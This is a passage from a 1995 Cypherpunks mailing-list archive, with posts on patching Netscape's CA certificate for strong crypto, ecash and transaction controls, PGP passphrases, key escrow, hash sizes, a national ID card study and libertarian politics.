and safe. The patch program > can confirm that the data being changed matches the test CA. This is an excellent idea, assuming the new CA's key will fit in the same amount of space or less than the test CA. How big is the test key? Of course, Netscape could decide to remove the test CA certificate from future versions of the browser. However, you could probably replace the Verisign certificate with your CA certificate and then have your CA sign the Verisign certificate so the browser can still use both. :-) > This second patch is more advantageous for end users as it allows > them to have strong encryption rather than the weak 40 bits which > we have been breaking. The first would be a more direct demonstration > of the difficulties of using certificate restrictions to limit > functionality. I don't think this is necessary as domestic versions of Netscape have already been exported and are available on non-U.S. FTP sites... > The criteria.txt paper suggests checksumming the cryptographic > routines to prevent patches like this, but generally I think such > checksums can be defeated pretty easily. I doubt that Netscape > currently has any such thing, though. It only makes it harder to patch. Anyone with a clue knows that there is no such software-only protection that can't be defeated. Even hardware/software dongle type protection can be defeated by altering the software to not check. andrew From frissell at panix.com Fri Sep 8 10:22:19 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 8 Sep 95 10:22:19 PDT Subject: Car rentals, Driver's Licenses, Ecash, & Net Access Message-ID: <199509081721.NAA00705@panix.com> Lucky Green's reply to someone else motivated me to comment: >>Suppose you have acquired a million dollars worth of legal, above-board >>DigiCash dollars and you want to surreptitiously transfer this wealth to a >>below-board friend. Your friend creates a temporary anonymous account at an >>understanding bank. Y > >Won't work. Ecash, except as used for frequent flyer like points, will >exist in only *one* world wide e$ currency, issued by a single entity >composed of various major banks and subject to US laws. Getting Ecash >accounts will therefore be subject to the same legal requirements that >apply to normal US checking accounts. For the holiday weekend, I rented a car at a major agency in the state where I usually sleep. To secure the rental, I presented a driver's license from another state and a secured VISA card. The agency presented me with a car bearing the license plates of a Southern state far away from the rental location. In the past, this agency (one of the majors BTW) had given me a car registered in yet another Southern state for a week's rental bearing a registration that expired halfway through that week. No problems in any case. Interestingly enough, the agency refuses to rent to local citizens of the state where it is located and where I often sleep. My posession of a "foreign" DL makes it easier for me to rent cars. Money and imagination overcomes many of the "social control" aspects of licensing and registration requirements. Now what this all has to do with transaction controls is the following. It is suggested that governments and private parties will cooperate in imposing absolute restrictions on people's ability to complete "unlicensed" transactions. Thus it is suggested that driving, posession of a motor vehicle, working for pay, having a bank account, having a phone account, having a net account can all be rigidly controlled. We've all read the stories about the DMV and how various states are pulling licenses for child support arrears, tax evasion, overdue library books, etc. The Feds have proposed a National SS# Database that would have to be consulted before the 60 Million people who annually change jobs would be allowed to do so. And it is easy to imagine that additional restrictions would soon be placed on job changes. After all, we don't want deadbeat dad-tax evading-library book hoarders working in this country, do we? Likewise the Bank Secrecy Act of 1970, et seq was supposed to end anonymous bank accounts. And a lot of the recent porn on the nets agitation has involved attacks on anonymity. Suggestions have been made for licensing net access. Finally, electronic check proposals are supposed to be traceable because those who open accounts will be identified. The readers of this list can apply what they already know about the difficulty involved in restricting net access to the analysis of these other existing and proposed restrictions. The problem with the theory of transaction blocking is that it requires millions of potential sellers of goods, services, and jobs around the world to turn away customers. Something that most people are unwilling to do. Thus, if some entity tries to control net access by restricting it to "licensed" users --- a real legal problem in the US BTW --- all that you have to do is open an account somewhere else on earth and dial out to it or use a connection via an X25 network. All the Great Enemy can do is make you spend a little more money. Eventually of course, encrypted untraceable TCP/IP sessions will be possible and domestic ISPs could -- without risk --- offer "encrypted only" pipes out to the nets. "Once you get there it's up to you what you do but we don't/can't know about it." Note that soon, millions of people will have high-speed, cable-based, full-time net access. These people will be one mouse click away from being a full-service ISP. Stick the ISP in a Box BSD CD-ROM in the drive and double-click on setup.exe. If the CD-ROM is produced by the right parties, it will automatically support encrypted TCP/IP. These millions of ISPs can offer net-access accounts right away and add dial up later for the neighbors if they feel like it. It is the vast number of vendors and the cheapness of the connection that makes it so hard to control net access. The computer and telecoms revolution has the same effect on banking and other services to which the authorities hope to block access. Thus cheap telecoms, computing power, and well-developed electronic funds transfer systems are easily turned into free banking. We all know that every node/user on the net is a potential gateway to another network (potentially of great size) on the "other side" of his connection. In the same way, every user of "cheap, easy, and open" electronic funds transfer system is a potential bank, a potential money "switch". The famous Fort Lee Switch located in Fort Lee, New Jersey at the West end of the George Washington Bridge is an important switch for the financial funds transfer networks going into and out of NYC. Think of it as the IBM 360 running a proprietary operating system on a somewhat closed loop. The future open funds transfer systems will be like the personal computers that can far exceed the performance of the old monopoly mainframes. Since everyone will be able to switch funds (and every *one* includes every fictitious entity, software agent, corporation, trust, organization, or firm anyone can create on earth) they will be able to switch funds for anyone else. Controlling a system with an almost unlimited number of switch points will not prove possible. Individuals and the entities they control can be counted on to protect themselves from the financial losses occasioned by fraud or theft. They can be their own auditors. But they can't be counted on to forego profit so that the governments of the world can try and prevent some people from engaging in mutually beneficial private transactions. An attempted cartel of that sort --- one that tries to enlist the billion or so people who will be easily and reliably switching funds within a few years --- is doomed to failure. Too many potential 'cheaters.' Too much money to be made by breaking with the cartel and offering financial services to others who wish to use them. And where money leads, other forms of human interaction will follow. Once money is free it can buy, bribe, or finagle it's way past the other attempted restrictions on voluntary transactions. DCF "If you can figure out a way to keep 1 billion people who have cheap, powerful, uncensored, computers and telecommunications from being free; you're a better man than I am Gunga Din." From mark at unicorn.com Fri Sep 8 10:23:40 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Fri, 8 Sep 95 10:23:40 PDT Subject: Scientology tries to break PGP - and fails? Message-ID: On Fri, 8 Sep 1995, Tom Rollins wrote: > I took a look at the FACTNet web page. There is a file encrypted with > PGP using the "-c" option. They are asking for people to help guess > the Pass Phrase. Why would anyone bother if they had no clue that the > file contained anything 'interesting'. I can only assume one of two things - either this is a joke, as the decrypted contents are nothing special as far as I can see (though 'interesting' in a sense), or that someone is very, very clever and managed to hide two different messages in there with different passphrases. > If this is the file that the Co$ is trying to crack, then what the > is being asked for is a pass phrase that can be handed to the Co$ that > will pass the PGP valid key check and still not decrypt the data to > anything usefull. If this is the file the Co$ want to crack, they're a) clearly cryptographically inept, and b) the joke's clearly on them 8-).. Any hacker worthy of the name ought to get the passphrase within three attempts (I got it first time). Note for paranoids: Of course, this message may just be a ruse to put the Co$ off the scent ;-).. Mark From trei at process.com Fri Sep 8 10:32:50 1995 From: trei at process.com (Peter Trei) Date: Fri, 8 Sep 95 10:32:50 PDT Subject: (Fwd) CFP: Workshop on Information Hiding Message-ID: <9509081732.AA26869@toad.com> This was on the www-security list. ------- Forwarded Message Follows ------- Date: Mon, 28 Aug 95 12:11:06 EDT From: allegra!slow at uunet.uu.net (Steven H. Low) There's a www version on http://www.cl.cam.ac.uk/users/rja14/ihws.html ================================================================= Workshop on Information Hiding First Call for Papers 30 May - 1 June 1996 Isaac Newton Institute, University of Cambridge, UK Many researchers are interested in hiding information or in stopping other people doing this. Until now, their efforts have been fragmented, with different groups interested in copyright marking of digital objects, covert channels in computer systems, subliminal channels in cryptographic protocols, broadcast encryption schemes, low-probability-of-intercept communications such as spread spectrum and meteor scatter, and various kinds of anonymity services ranging from steganography through location security to digital elections. However these areas of study are closely linked, and we wish to create an opportunity for a fruitful exchange of ideas. We are therefore organising a workshop on information hiding, which will form part of a six month research programme being held at the Isaac Newton Institute on Computer Security, Cryptography and Coding Theory. Given a positive response from the research community, it is hoped that this will become a regular event. Instructions for authors: Interested parties are invited to submit papers on research and practice which are related to these areas of interest. Submissions can be made electronically (latex or postscript; preferred format is latex using llncs.sty) or in paper form; in the latter case, send eight copies suitable for blind refereeing (the authors' names should be on a separate cover sheet and there should be no obvious references). Papers should not exceed fifteen pages in length. Addresses for submission: ross.anderson at cl.cam.ac.uk Ross Anderson, Cambridge University Computer Laboratory, Pembroke Street, Cambridge CB2 3QG, England Deadlines: Paper submission: 31st December 1995 Notification of acceptance: 29th February 1996 Camera-ready copy due: 31st March 1996 Program committee: Ross Anderson (Cambridge University) Steve Low (AT&T Bell Laboratories) Ira Moskowitz (US Naval Research Laboratory) Andreas Pfitzmann (Technical University of Dresden) Gus Simmons (University of New Mexico) Michael Waidner (IBM, Zuerich) Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From andrew_loewenstern at il.us.swissbank.com Fri Sep 8 10:35:59 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 8 Sep 95 10:35:59 PDT Subject: Hacking banking (fwd) Message-ID: <9509081735.AA03442@ch1d157nwk> David Weisner writes, in a message forwarded by Brad Dolan: > "Already, Fuentes said, federal authorities in New York are > investigating whether programmers hired to write software for a > financial institution may have left a 'back door' open in the > program, one through which money may have been diverted to foreign > bank accounts." > Does anyone know what this federal investigation in New York is > about? How about copying this note around and seeing what people > can find out? Perhaps this is related to the recent Citicorp (Citibank? I have trouble keeping up...) job done by the people in Russia? andrew From trollins at hns.com Fri Sep 8 10:40:11 1995 From: trollins at hns.com (Tom Rollins) Date: Fri, 8 Sep 95 10:40:11 PDT Subject: Scientology tries to break PGP - and fails? In-Reply-To: Message-ID: <9509081739.AA20098@dcn92.hns.com> > > On Fri, 8 Sep 1995, Tom Rollins wrote: > > > I took a look at the FACTNet web page. There is a file encrypted with > > PGP using the "-c" option. They are asking for people to help guess > > the Pass Phrase. Why would anyone bother if they had no clue that the > > file contained anything 'interesting'. > > I can only assume one of two things - either this is a joke, as the > decrypted contents are nothing special as far as I can see (though > 'interesting' in a sense), or that someone is very, very clever and > managed to hide two different messages in there with different > passphrases. > > > If this is the file that the Co$ is trying to crack, then what the > > is being asked for is a pass phrase that can be handed to the Co$ that > > will pass the PGP valid key check and still not decrypt the data to > > anything usefull. > > If this is the file the Co$ want to crack, they're a) clearly > cryptographically inept, and b) the joke's clearly on them 8-).. Any > hacker worthy of the name ought to get the passphrase within three > attempts (I got it first time). > > Note for paranoids: Of course, this message may just be a ruse to put > the Co$ off the scent ;-).. > > Mark Ooops, I see what you mean. It is funny ! I simply did not take this at face value. -tom From andrew_loewenstern at il.us.swissbank.com Fri Sep 8 10:43:41 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 8 Sep 95 10:43:41 PDT Subject: 64-bit GAK && 128-bit hashes Message-ID: <9509081743.AA03448@ch1d157nwk> The recent guidelines for proposed export regulations from NIST include 64-bit keys and several people here have commented that this implies NSA ability to brute-force 64-bit keys now or in the near future ("belt and suspenders"). How does this bode for 128-bit hash functions such as MD5? If 64-bit encryption algorithms can be brute-forced, could birthday attacks and the like on 128-bit hashes be feasable as well? Perhaps the crypto community should start serously considering moving away from MD5 and towards 160-bit hashes such as SHA or even 256-bits... andrew From sinclai at ecf.toronto.edu Fri Sep 8 11:16:47 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Fri, 8 Sep 95 11:16:47 PDT Subject: Privacy book list Message-ID: <95Sep8.141612edt.4207@cannon.ecf.toronto.edu> I got a letter in the mail today from Plenum Publishing Corp in NY, advertising a book called _Mind Your Own Business: The Battle for Personal Privacy_ by Gini Graham Scott. It seems I am on a mailing list for privacy freaks. Oh the irony! They must have gotten my name from somewhere. The only two sources that I can think of are the lists for CFP '94 and '95, and a revolver club that I used to be a member of. Has anyone else on the list gotten this ad? From tedwards at src.umd.edu Fri Sep 8 11:25:35 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Fri, 8 Sep 95 11:25:35 PDT Subject: Commercial Speech over Internet product In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Matthew Ghio wrote: > The program is a sound-listening extention for web-browsers. There is > really no use for crypto because it's only processing information which > is already public. I can easilly imagine pay recorded sex lines or pay stock market analysis via this service, either of which you might want to have encrypted. -Thomas From tedwards at src.umd.edu Fri Sep 8 11:42:54 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Fri, 8 Sep 95 11:42:54 PDT Subject: Correction about who opposes crypto regulations.... In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Timothy C. May wrote: > On the contrary, the Libertarian Party has come out strongly in favor of > cryptography and privacy, and they are consistently either #3 or #4 in > popularity. The US Libertarian Party Platform supports crypto, and the LP has issued press releases critical of the FBI Telecom (wiretapping) Bill and Clipper. The LP was also part of the coalition against internet censorship this year. The LP is the third largest political party in the US, and party members hold over 150 elected and appointed public offices in the U.S. They will again have a presidential candidate on the ballot in all 50 states next year as they did in the last election, and a potential LP presidential candidate (Harry Browne, http://www.rahul.net/browne) will be in the CityVote debates which will be nationally televised next month. The LP was also the first party to have a female candidate who won an Electoral College vote. For more details on the LP, you should go to http://www.lp.org/lp -Thomas Edwards From tedwards at src.umd.edu Fri Sep 8 11:45:51 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Fri, 8 Sep 95 11:45:51 PDT Subject: ON OFF-TOPIC In-Reply-To: Message-ID: On Thu, 7 Sep 1995, Yih-Chun Hu wrote: > Whatever. Clinton proposed crypto, some democrat wrote the electronic > decency act. (In fact Gingrich was against it) Nevertheless, Gingrinch did not flinch when internet censorship ammendments to the telecom bill went right by him in the House. -Thomas From sunder at escape.com Fri Sep 8 11:57:31 1995 From: sunder at escape.com (Ray Arachelian) Date: Fri, 8 Sep 95 11:57:31 PDT Subject: cryptography eliminates lawyers? In-Reply-To: <199509061709.MAA00612@bioanalytical.com> Message-ID: We wish! We really wish! ========================================================================== + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | _ |> \|/ |sunder at escape.com| Where day by day, yet another | \ | <--+-->| | Constitutional right vanishes. | \| /|\ | Just Say | | <|\ + v + | "No" to the NSA!| Jail the censor, not the author!| <| n ========================================================================== From mfroomki at umiami.ir.miami.edu Fri Sep 8 11:57:33 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Fri, 8 Sep 95 11:57:33 PDT Subject: Looking for IETF old-timers (and others) Message-ID: I've put up on a web page some parts of a paper I am writing on Internet jurisprudence. I'd welcome comments from anyone (this is a very early draft), but especially from any IETF old-timers, as the paper has a lot about the early days of internet standardmaking. The URL is http://www.law.miami.edu/~mfroomki/ils/ils.htm A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid. Coral Gables, FL 33124 USA | See (soon to move to its real home): http://www.law.miami.edu/~mfroomki From tedwards at src.umd.edu Fri Sep 8 12:20:21 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Fri, 8 Sep 95 12:20:21 PDT Subject: Cato Study Release: National ID Card Ineffective and Intrusive Message-ID: CATO STUDY RELEASE September 7, 1995 National ID card ineffective and intrusive, study says Congressional Republican proposals to create a national computerized registry and an ID card for all American workers would establish "a dangerous, invasive, and unworkable new expansion of federal police-state powers," according to a new Cato Institute study. In "A National ID System: Big Brother's Solution to Illegal Immigration" (Policy Analysis no. 237), John J. Miller and Stephen Moore say Sen. Alan Simpson (R-Wyo.) and Rep. Lamar Smith (R-Tex.) are taking the "critical first step" toward implementing a potentially invasive national worker authorization system. Moore is director of fiscal policy studies at the Cato Institute, and Miller is vice president of the Center for Equal Opportunity. An Orwellian system The authors say that Smith and Simpson want to require an ID card and computerized worker registry for the 150 million Americans and legal immigrants in the U.S. labor force. Sen. Dianne Feinstein (D-Calif.) wants that national ID card to include such information as a photograph, fingerprint, and retina scan. The study says such a system would, in effect, "require employers to submit all of their hiring decisions for approval to a federal bureaucrat." The authors call the proposed registry and national ID card "Big Brother's solution to illegal immigration." They say the national ID card would constitute a massive invasion of privacy and violation of basic civil liberties; cost the government $3 billion to $6 billion to implement; subject workers to the effects of potentially huge error rates, with perhaps millions of legal aliens denied jobs because of faulty government databases (even a 2 percent error rate would lead to 1.3 million Americans being wrongfully denied jobs); increase discrimination against Latin and Asian Americans; and, ultimately, fail to affect illegal immigration. Moore and Miller say that, once established, the computer registry could be easily expanded and applied to other areas, vastly increasing the size and scope of government. Some of the potential uses of the system include implementing a Clinton-style health care plan and security card; ensuring employer compliance with affirmative action requirements; tracking child support payments; verifying that parents are getting their children vaccinated; and conducting background checks on would-be gun purchasers, among others. Better approaches available After spending a year defeating the Clinton administration's health security card, Moore and Miller say, the new GOP Congress now wants every American to carry a "work authorization card" that would create similar potential for intrusion and abuse. The authors claim there are ways to address the problem of illegal immigration that would expand, rather than curtail, Americans' basic freedoms. We could, for example, expand legal immigration quotas, eliminate employer sanctions law, establish greater economic integration between the United States and Mexico, restrict welfare eligibility of legal and illegal immigrants, facilitate the deportation of criminal aliens, tighten visa control, and improve border enforcement. Why it matters It is an iron rule of politics that whenever there is a perceived "crisis" in Washington, Congress responds by passing bad laws that expand the powers of government. Moore and Miller say the immigration issue is fertile ground for such laws. The implications of a national ID system would range far beyond today's debate over illegal immigration. The study says the proposed worker registry system has no redeeming feature. It will not curtail illegal immigration, and it will create opportunities for abuse. At a time when Americans are loudly demanding more freedom and smaller government, Moore and Miller say a computer registry is a giant step in the wrong direction. From hfarkas at ims.advantis.com Fri Sep 8 12:38:19 1995 From: hfarkas at ims.advantis.com (Henry W. Farkas) Date: Fri, 8 Sep 95 12:38:19 PDT Subject: Scientology tries to break PGP - and fails? In-Reply-To: <9509081620.AA19816@dcn92.hns.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 8 Sep 1995, Tom Rollins wrote: > If Larry Wollersheim does have the valid key. It would be a simpler > process to know what fake key to use and work it backwards through > the MD5 to arrive at an ascii string to produce the fake key. > > Too bad this wouldn't be plausable for the secret ring. Perhaps PGP > needs an option to specify the key in Hex and make the process easy. Here's another option. I just have no idea if it is possible, nor how it would be implemented! PGP could allow for an alternate secret key and a boilerplate document. This document would be "overlaid" or appended to the target file at encryption. When the safety is finally removed from the gun at your head (sorry for the drama) you hand over your alternate secret key. The encrypted file is wiped until it reaches a marker; the remainder of the file is displayed. If you are forced to turn over keys some day (and I think there is at least a reasonable likeihood of that) then They will have a much harder time arguing "But that's not what the file *really* said and, deep inside of me, I know it!". At that point, with a secure wipe going on while the "decryption" was taking place, you have done the best you could. I agree- a search warrent gives authorities the right to search your home (or disk)- not a guarantee that they'll find what they're looking for. =========================================================================== Henry W. Farkas | Me? Speak for IBM? Fat chance. hfarkas at ims.advantis.com |------------------------------------------------ hfarkas at vnet.ibm.com | http://newstand.ims.advantis.com/henry henry at nhcc.com | http://www.nhcc.com/~henry - --------------------------------------------------------------------------- PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52 B3 80 34 1C CE 38 EC 53 Public key at: pgp-public-keys at pgp.mit.edu, and other popular key servers. - --------------------------------------------------------------------------- Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not fast, but it's not bad, and we're cheaper than the guy down the street!" =========================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta iQCVAwUBMFCbU6DthkLkvrK9AQExWwQAoXSQ+6rL2tLf61F1Zj7fX6gO4ZZOaASZ O5v0aDN1LXttmv+YUslMU8B1mpKexVk5FZDBMJ2MkonDssi5kcNNhUKc911x7zyh oLh1I8lA4RPKdrxY7AuRF+GQpOmHFpb6FK18Aq+EkiJX5mmKpCANY8tYqcpiZ4o7 GHt0DVuKhaE= =uQD0 -----END PGP SIGNATURE----- From tbyfield at panix.com Fri Sep 8 12:45:46 1995 From: tbyfield at panix.com (Ted Byfield) Date: Fri, 8 Sep 95 12:45:46 PDT Subject: Car rentals, Driver's Licenses, Ecash, & Net Access Message-ID: At 1:21 PM 9/8/95, Duncan Frissell wrote a very interesting disquisition: >An attempted cartel of that sort --- one that tries to enlist the billion or >so people who will be easily and reliably switching funds within a few years >--- is doomed to failure. Too many potential 'cheaters.' Too much money to >be made by breaking with the cartel and offering financial services to >others who wish to use them. One question: Most of your remarks (and you're in no way alone in this regard) seem to assume that uniformity is a sine qua non of law enforcement (as opposed, say, to selective enforcement. Correct me if I'm wrong. I wonder, though, whether this is so; isn't it true that the impossibility of consistent enforcement may well encourage a systemically selective enforcement (maybe shaped by this or that, one's politics, for example)? Presumably, then, law enforcement would take on an increasingly "terroristic" character--"random," as IRS audits and the like can be. Some recent high-profile cases (Packwood, and Kenneth Starr's efforts to indict Gov. Tucker) might indicate the shape that enforcement could take, especially in light of some recent congressional legislative efforts: the gov't investigates you regarding X, in the process of the investigation turns up Y and Z, and thus finds reason maybe to look into A, B, and C as well--in effect, turning your life into a nightmare. But I digress: The main point, really, is that enforcement doesn't need to be nonselective to be "effective." I think this holds whether I understood your remarks correctly or not. Ted From stewarts at ix.netcom.com Fri Sep 8 13:06:19 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 8 Sep 95 13:06:19 PDT Subject: [NOISE] Re: Notes from NIS&T Key Escrow Export conference. Message-ID: <199509082006.NAA24844@ix8.ix.netcom.com> At 09:04 PM 9/7/95 -0500, you wrote: >> Sorry for the typo, yes, I meant sham, fake, theater, all smoke and >> mirrors, nothing sincere, etc. See reference to "stage" above. >> >In this context, I think burlesque fits remarkably well. ;) >(Brings to mind a bunch of cross-dressors doing big theatre numbers >in exotic costumes) "I never wanted to be an eavesdropper - I wanted to be a ... lumberjack!" #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Fri Sep 8 13:07:37 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 8 Sep 95 13:07:37 PDT Subject: cryptography eliminates lawyers? Message-ID: <199509082006.NAA24910@ix8.ix.netcom.com> >> > Telecoms will certainly break the professional >> > monopoly of lawyers (and other professionals). >> This I don't. How do you mean exactly? >Licensing requires the ability to outlaw unlicensed transactions. >Since the Net trumps censorship and allows consultations at a >distance, it cracks licensing, It does reduce the ability of geographical organizations to restrict who does business there, so markets will probably force some shakeups in jurisdictions. But lawyer work seems to mostly involve either contracts or courts - as long as courts are still run by governments, they can restrict who gets to practice in them, and who's allowed to write paper that they'll judge disputes about. Crypto _could_ be used for a modern version of the Stamp Tax - documents might need to be digitally signed by Certified Lawyers (though of course that may be lawyers putting their stamps on work mostly done by clerks.) Crypto may make it easier to resolve some kinds of disputes, by identifying who did what when, but the net isn't going to make the number of disputes decrease.... #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Fri Sep 8 13:08:20 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 8 Sep 95 13:08:20 PDT Subject: ON OFF-TOPIC [NOISE] Message-ID: <199509082006.NAA24898@ix8.ix.netcom.com> At 10:16 PM 9/7/95 -0400, Phill wrote: >>Nope. but the patriots & the cyPHerpunks share a common goal, and belief >>that it is none of the government's business what we think or want to >>share with our computers. >Poor you, the only major political party to come out with a pro crypto statement >is a socialist party. But - wait! Of course you're not a patriot - You're a foreigner! Oh, no! :-) >The problem is currently with the right wing, right wing democrats such as >Clinton and practically all the Republicans. As you later point out, it's really an authoritarian/libertarian issue, (though it's at least nice to hear somebody else who realizes Clinton's no liberal :-); it affects both economic control/freedom issues and freedom of speech issues as well. A lot of the Republicans, mainly the newly elected ones, are less anti-crypto, partly because they're pro-business, and sometimes pro-free-speech, but also because they're not as closely tied in to the authoritarian power structure the way Bush and Clinton have been. >If you want a debate on how to convince the authoritarians then perhaps you will >get some interest. That'll be tough. The military and police can already get good crypto, as can other gov't agencies that want to use it to increase their power. Crypto can also be really effective for National ID cards, but I'd really rather not encourage them to think along those lines at all, even using Chaum techniques. You can use it to hide campaign contributions and bribes, but of course they probably don't want to admit that in public. If everyone in the government were to use key-escrowed phones, folks like Ollie North would probably realize they had to be careful with their communications, but it would at least let gentlemen read each others' mail... Is there something authoritarians want, that we don't mind them having, for which crypto would be an enabling technology? Some of them _might_ be interested in having better encryption for TV channels so that kids can't watch a NotForKids channel (though many of them might rather ban it outright) or so they can easily control whether their kids get to watch MTV even though the V-Chip doesn't have a NoisyKidsMusic bit. Perhaps they'd enjoy having reputation systems available, so they can easily filter out politically incorrect material, or do a thumbs-down on things they disapprove of, or let the Baptists and Catholics and Anti-Baptists all have their own convenient ratings. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From eb at comsec.com Fri Sep 8 14:04:51 1995 From: eb at comsec.com (Eric Blossom) Date: Fri, 8 Sep 95 14:04:51 PDT Subject: Cypherpunks Lite archives now available Message-ID: <199509082050.NAA22694@comsec.com> I've made available archives of the last 8 months of Cypherpunks Lite for your perusal. ftp://ftp.crl.com/users/co/comsec/cp-lite One year subscriptions are available for $20. To subscribe, send check or money order to: COMSEC Partners 1275 Fourth St., Suite 194 Santa Rosa, CA 95404. Be sure to indicate your email address and whether you want message-by-message delivery or a daily digest. Eric From keelings at wu1.wl.aecl.ca Fri Sep 8 14:35:20 1995 From: keelings at wu1.wl.aecl.ca (S. Keeling) Date: Fri, 8 Sep 95 14:35:20 PDT Subject: ECPA (Was: University logging mail to anon.penet.fi) Message-ID: <9509082134.AA19037@wu1.wl.aecl.ca> Incoming from Jim Ray: > "Josh M. Osborne" writes: > > >down somewhat, in a very libertarian society oyu might be able to > >run a profatable ISP selling to the very nich market of people who > >want to threten, harass, or generally make a nuicence of themselves). > > As the list's designated "very libertarian" advocate, I must object. > Here is what you must sign to become a member of the Libertarian Party: And here, I must object (sorry Perry; I'll be brief). Whatever do the workings of an hypothetical "libertarian" society have to do with the "Libertarian Party"? Certainly, it would be nice if the latter were working towards the former, but the two are not the same. I know of quite a few `l'ibertarians who strongly object to the `L'ibertarian Party pledge. -- "Remember, obsolescence (Win95) isn't an accident; it's an art form!" keelings at wu1.wl.aecl.ca s. keeling, aecl - whiteshell labs From jya at pipeline.com Fri Sep 8 14:35:52 1995 From: jya at pipeline.com (John Young) Date: Fri, 8 Sep 95 14:35:52 PDT Subject: 9K P6 Message-ID: <199509082135.RAA26681@pipe2.nyc.pipeline.com> There's a bit more on Intel's supercomp virtual NW tester at: URL: http://www.ssd.intel.com/press/asci1.html Here's a sample: ---------- Intel Scalable Systems Division Fortunately, advances in computer hardware and software technologies are making computer-based virtual weapons testing and prototyping a viable and affordable alternative to the traditional nuclear and non-nuclear testing of stockpile stewardship. The Intel teraflop computer announced today is a key milestone in the shift from nuclear testing to computer-simulated testing. The ASCI Program Located within the DOE's Defense Programs (DP) laboratories, the U.S. Department of Energy's Accelerated Strategic Computing Initiative (ASCI) is a multi-year program to extend DOE's computational resources to support virtual testing and prototyping capabilities for nuclear weapons. ... ASCI has four objectives, each of which requires computational capabilities that are beyond the capabilities of existing systems: * Performance -- Create credible virtual tests to analyze the performance and predict the behavior of nuclear weapons. * Safety -- Predict the behavior of full weapons systems in complex accident scenarios. * Reliability -- Develop the ability to make predictions that will extend the lifetime of current weapons, predict failure mechanisms and reduce routine maintenance requirements. * Renewal -- Use virtual prototyping to reduce production and testing facilities for stockpile requalification and replacement work. ... Beyond its weapons safety impact, the teraflop computer will have a wide range of other applications -- from developing safer, more efficient cars to simulating natural disasters in real-time to finding new drugs to fight disease. The machine will be one of the world's foremost scientific research tools and will act as a magnet for advanced research projects. In 1963, John Kennedy referred to a test ban treaty as a shaft of light cut into the darkness of the Cold War -- a chance to step back from the shadows of war. Today, by making it possible to ensure the safety, reliability, and performance of the weapons stockpile while foregoing nuclear testing, the Intel/Sandia teraflop computer can help the world take a further step back from the shadows of war into the light of peace. From cme at TIS.COM Fri Sep 8 14:44:11 1995 From: cme at TIS.COM (Carl Ellison) Date: Fri, 8 Sep 95 14:44:11 PDT Subject: GAK In-Reply-To: <199509082005.NAA22461@comsec.com> Message-ID: <9509082139.AA09726@tis.com> >Date: Thu, 7 Sep 1995 13:09:03 -0800 >From: cman at communities.com (Douglas Barnes) > >One good (non-cypherpunk) argument against GAK is that it >concentrates a very large quantity of valuable keys in a few >places, where they become an extremely attractive target for >government or corporate espionage. [...] >Note that a few million keys would fit very easily on even a >low-end DAT tape (easily hidden in a pack of cigarettes). The same danger happens with the TIS DRC (see the company web page), even though there is no key escrow in the TIS system. Instead, the emergency access field (Data Recovery Field (DRF)) is stored with the file -- but the key which encrypts it is the public key of the Data Recovery Center (DRC). If too much attractive stuff is available by loss of any one public key, that key gets attacked. To compensate for this, the TIS DRC generates new public keys periodically to give out to new (or old) customers. However, a government warrant which demands the DRC's private key collection would gain quite a harvest. +--------------------------------------------------------------------------+ |Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme/home.html| |Trusted Information Systems, Inc. http://www.tis.com/ | |3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2| |Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 | +--------------------------------------------------------------------------+ From KLAURICH at uofrlaw.urich.edu Fri Sep 8 15:00:50 1995 From: KLAURICH at uofrlaw.urich.edu (Richard P. Klau) Date: Fri, 8 Sep 95 15:00:50 PDT Subject: Privacy book list Message-ID: <2A82FB42074@UOFRLAW.URICH.EDU> > I got a letter in the mail today from Plenum Publishing Corp in NY, > advertising a book called _Mind Your Own Business: The Battle for > Personal Privacy_ by Gini Graham Scott. It seems I am on a > mailing list for privacy freaks. Oh the irony! > > They must have gotten my name from somewhere. The only two sources that > I can think of are the lists for CFP '94 and '95, and a > revolver club that I used to be a member of. Has anyone else on the > list gotten this ad? I got the ad (and a subsequent review copy, upon request) after we published the first issue of the Journal of Law & Technology on the web. It appears that they got my name, and address, from the web (both are displayed in the "Contacting the Journal" page). I haven't had much time to read the book, but my recollection is that it is somewhat misguided in its analysis of privacy online. Its historical perspective is fairly thorough, however. --Rick Klau --------- Richard P. Klau (3L) // klaurich at uofrlaw.urich.edu Editor in Chief, Richmond Journal of Law & Technology http://www.urich.edu/~jolt/ From cme at acm.org Fri 